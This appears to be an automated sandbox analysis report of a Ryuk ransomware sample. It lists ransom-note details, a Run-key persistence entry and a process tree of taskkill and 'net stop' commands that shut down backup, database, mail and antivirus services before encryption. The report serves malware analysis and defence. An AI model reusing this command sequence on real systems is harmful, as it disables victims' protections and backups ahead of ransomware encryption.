Analysis
max time kernel: 148s
max time network: 154s
platform: windows10_x64
resource: win10v20210410
submitted: 17-04-2021 13:15
Static task: static1
Behavioral task behavioral1: sample dll64.dll, resource win7v20210408
Behavioral task behavioral2: sample dll64.dll, resource win10v20210410
Behavioral task behavioral3: sample svchost.exe, resource win7v20210408
Behavioral task behavioral4: sample svchost.exe, resource win10v20210410
General
Target: svchost.exe
Malware Config
Extracted from: C:\RyukReadMe.txt
Family: ryuk
Contact emails: eliasmarco@tutanota.com, CamdenScott@protonmail.com
Bitcoin address: 15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Signatures
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
Executes dropped EXE (1 IoC)
Processes: ZqqUZ.exe (PID 2588)
Modifies extensions of user files (1 IoC)
Ransomware generally changes the extension on encrypted files.
Processes: svchost.exe; file opened for modification: C:\Users\Admin\Pictures\ResolveHide.tiff
Deletes itself (1 IoC)
Processes: ZqqUZ.exe (PID 2588)
Drops startup file (1 IoC)
Processes: svchost.exe; file opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
- Key created: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\users\\Public\\ZqqUZ.exe"
Suspicious use of SetThreadContext (1 IoC)
Processes: svchost.exe (PID 3976) set thread context of svchost.exe (PID 1804)
Drops file in Program Files directory (64 IoCs)
Processes: svchost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (1 IoC)
Processes: WerFault.exe (PID 7884), target process DllHost.exe (PID 3836)
Kills process with taskkill (44 IoCs)
Processes: taskkill.exe, 44 instances (PIDs 5012, 5660, 1016, 3096, 2688, 4724, 4528, 4124, 4172, 4656, 5152, 5720, 5784, 4944, 5068, 5276, 5848, 1312, 2108, 4164, 4460, 4404, 4952, 900, 4004, 4216, 4328, 2760, 5332, 5512, 748, 652, 428, 3984, 5444, 4276, 4588, 4792, 5216, 5588, 3856, 4868, 4512, 5396)
Runs net.exe
Suspicious behavior: EnumeratesProcesses (30 IoCs)
Processes: ZqqUZ.exe (PID 2588), 2 entries; WerFault.exe (PID 7884), 28 entries
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes: ZqqUZ.exe (PID 2588)
Suspicious use of AdjustPrivilegeToken (46 IoCs)
Processes (Token: SeDebugPrivilege in every case):
- taskkill.exe, 44 instances (PIDs 748, 652, 3856, 1016, 1312, 2108, 3096, 900, 2688, 4004, 428, 3984, 4164, 4216, 4328, 4276, 4460, 4404, 4528, 4588, 4656, 4724, 4792, 4868, 4944, 5068, 5012, 4124, 4512, 2760, 4172, 4952, 5152, 5216, 5276, 5396, 5332, 5444, 5512, 5588, 5660, 5784, 5720, 5848)
- ZqqUZ.exe (PID 2588)
- WerFault.exe (PID 7884)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
- svchost.exe (PID 3976) wrote to memory of svchost.exe (PID 1804): 11 entries
- svchost.exe (PID 1804) wrote to memory of ZqqUZ.exe (PID 2588): 2 entries
- ZqqUZ.exe (PID 2588) wrote to memory of taskkill.exe, two entries per child, in this order of target PIDs: 748, 652, 3856, 1016, 1312, 3096, 2108, 900, 2688, 4004, 428, 3984, 4164, 4216, 4276, 4328, 4404, 4460, 4528, 4588, 4656, 4724, 4792, 4868, 4944, 5012 (the report stops at its 64-IoC cap, so only one entry for PID 5012 is shown)
Processes (tree; the number in brackets is the nesting level reported by the sandbox, and "image" is given where the command line does not name the executable path)
- [1] c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
    signatures: Modifies extensions of user files; Drops startup file; Drops file in Program Files directory
- [1] C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - [2] C:\Windows\system32\WerFault.exe -u -p 3836 -s 848
      signatures: Program crash; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\System32\RuntimeBroker.exe -Embedding
- [1] "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
- [1] "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
- [1] taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} (image: c:\windows\system32\taskhostw.exe)
- [1] sihost.exe (image: c:\windows\system32\sihost.exe)
- [1] "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    signatures: Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
  - [2] "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      signatures: Suspicious use of WriteProcessMemory
    - [3] "C:\users\Public\ZqqUZ.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe
        signatures: Executes dropped EXE; Deletes itself; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [4] "C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
        - [5] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image: C:\Windows\System32\Conhost.exe)
      - [4] "C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
        - [5] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image: C:\Windows\System32\Conhost.exe)
      - [4] "C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
        - [5] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image: C:\Windows\System32\Conhost.exe)
      - [4] "C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
        - [5] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image: C:\Windows\System32\Conhost.exe)
      - [4] "C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
        - [5] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image: C:\Windows\System32\Conhost.exe)
      - [4] "C:\Windows\System32\taskkill.exe" /IM excel.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM steam.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM visio.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM winword.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
          signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - [4] "C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
        - [5] C:\Windows\system32\net1 stop "Acronis VSS Provider" /y (image: C:\Windows\system32\net1.exe)
          - [6] C:\Windows\system32\net1 stop sacsvr /y (image: C:\Windows\system32\net1.exe)
          - [6] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image: C:\Windows\System32\Conhost.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
        - [5] C:\Windows\system32\net1 stop "Enterprise Client Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos Agent" /y
        - [5] C:\Windows\system32\net1 stop "Sophos Agent" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos Clean Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos Device Control Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos Health Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
        - [5] C:\Windows\system32\net1 stop "Sophos MCS Client" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos Safestore Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
        - [5] C:\Windows\system32\net1 stop "Sophos Message Router" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
        - [5] C:\Windows\system32\net1 stop "Sophos MCS Agent" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos System Protection Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
        - [5] C:\Windows\system32\net1 stop "Sophos Web Control Service" /y (image: C:\Windows\system32\net1.exe)
          - [6] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image: C:\Windows\System32\Conhost.exe)
      - [4] "C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
        - [5] C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y (image: C:\Windows\system32\net1.exe)
        - [5] C:\Windows\system32\net1 stop MSSQLSERVER /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
        - [5] C:\Windows\system32\net1 stop "Symantec System Recovery" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
        - [5] C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
        - [5] C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop ARSM /y
        - [5] C:\Windows\system32\net1 stop ARSM /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
        - [5] C:\Windows\system32\net1 stop BackupExecAgentBrowser /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
        - [5] C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop Antivirus /y
        - [5] C:\Windows\system32\net1 stop Antivirus /y (image: C:\Windows\system32\net1.exe)
      - [4] "C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
        - [5] C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y (image: C:\Windows\system32\net1.exe)
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcrSch2Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcronisAgent /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecManagementService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop bedbg /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecRPCService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EraserSvc11710 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop FA_Scheduler /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IISAdmin /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EsgShKernel /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPUpdateService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPSecurityService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop DCAgent /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IMAP4Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop macmnsvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBAMService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBEndpointAgent /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeEngineService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFramework /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McShield /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McTaskManager /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfevtp /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfemms /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MMS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mozyprobackup /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop masvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeIS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMTA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL80 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ntrtscan /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop OracleClientCache80 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop POP3Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop PDVFSService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y5⤵
-
